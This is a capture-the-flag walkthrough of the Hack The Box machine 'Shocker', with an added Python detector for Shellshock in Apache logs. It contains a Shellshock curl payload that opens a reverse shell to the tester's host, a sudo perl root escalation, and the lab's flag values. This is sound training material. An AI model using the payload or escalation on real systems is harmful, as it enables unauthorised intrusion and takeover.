[HTB] Shocker

Today we are going to hack the HTB machine called Shocker.


Enumeration


To start, we run nmap to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 23:41 CEST
Nmap scan report for 10.10.10.56
Host is up (0.037s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
We look for anything interesting on Apache...

sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt -x sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh
[+] Timeout:        10s
===============================================================
2020/05/09 23:42:24 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/05/09 23:43:11 Finished
===============================================================
We look inside the cgi-bin directory.

sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh
[+] Timeout:        10s
===============================================================
2020/05/09 23:44:24 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.sh (Status: 403)
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/05/09 23:45:01 Finished
===============================================================
We find the user.sh file, a shell script served through cgi-bin, and everything points to us being able to "abuse" Shellshock...

Exploitation


We start nc listening:

sml@Cassandra:~$ nc -nlvp 5555
In another terminal, we use "shellshock" against the user.sh file

sml@Cassandra:~$ curl -H 'User-Agent: () { :; }; /bin/sh -i >& /dev/tcp/10.10.14.10/5555 0>&1' http://10.10.10.56/cgi-bin/user.sh
We're in :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 36732
/bin/sh: 0: can't access tty; job control turned off
$ 
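For the defender's side of the request above: an added detection example, not part of the original write-up, that scans constructed Apache combined-format access log lines for the Shellshock function-definition signature in request headers and marks hits aimed at cgi-bin as higher confidence. The sample log lines, LOG_RE and SHELLSHOCK_RE are assumptions made for this example.

```python
import re

# Constructed Apache combined-format access log lines (assumed sample data, not from the box).
# The first line carries the same header payload shown in the write-up, the second is
# ordinary browser traffic, and the third is a harmless probe variant.
SAMPLE_LOG = """\
10.10.14.10 - - [09/May/2020:23:46:01 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/sh -i >& /dev/tcp/10.10.14.10/5555 0>&1"
10.10.14.11 - - [09/May/2020:23:46:05 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.12 - - [09/May/2020:23:47:10 +0200] "GET /index.html HTTP/1.1" 200 137 "-" "() {:;}; echo vulnerable"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: a value that starts with a bash function definition "() { ... };"
# followed by trailing text, which a vulnerable bash executed when importing the env var.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;')


def find_shellshock(log_text):
    """Return one hit per log line whose user-agent, referer or request line carries the
    Shellshock signature. Requests under /cgi-bin/ are marked higher confidence because
    Apache's CGI handler exports request headers as environment variables for the script."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("ua", "referer", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "request": m.group("req"),
                    "status": m.group("status"),
                    "cgi_target": "/cgi-bin/" in m.group("req"),
                })
                break  # one hit per line is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        level = "HIGH" if hit["cgi_target"] else "MEDIUM"
        print(f'[{level}] {hit["ip"]} {hit["time"]} {hit["field"]}: {hit["request"]}')
```

Run it against a real access.log (`find_shellshock(open("/var/log/apache2/access.log").read())`) to triage after the fact; a web application firewall rule on the same pattern stops the request before it reaches the CGI script.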

user.txt


We explore the system...

$ id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ cd /home
$ ls
shelly
$ cd shelly
$ ls
user.txt
$ cat user.txt
2ec24e11320026d1e70ff3e16695b233

Privilege Escalation


We take a look at sudo...

$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
We see that we can run perl as "root", so we spawn a shell :)

$ sudo perl -e 'exec "/bin/sh";'
/bin/bash -i
bash: no job control in this shell
root@Shocker:/home/shelly# 

root.txt



root@Shocker:/home/shelly# cd /root
root@Shocker:~# ls
root.txt
root@Shocker:~# cat root.txt
cat root.txt
52c2715605d70c7619030560dc1ca467

End


And with that we have both the "user" flag and the "root" flag.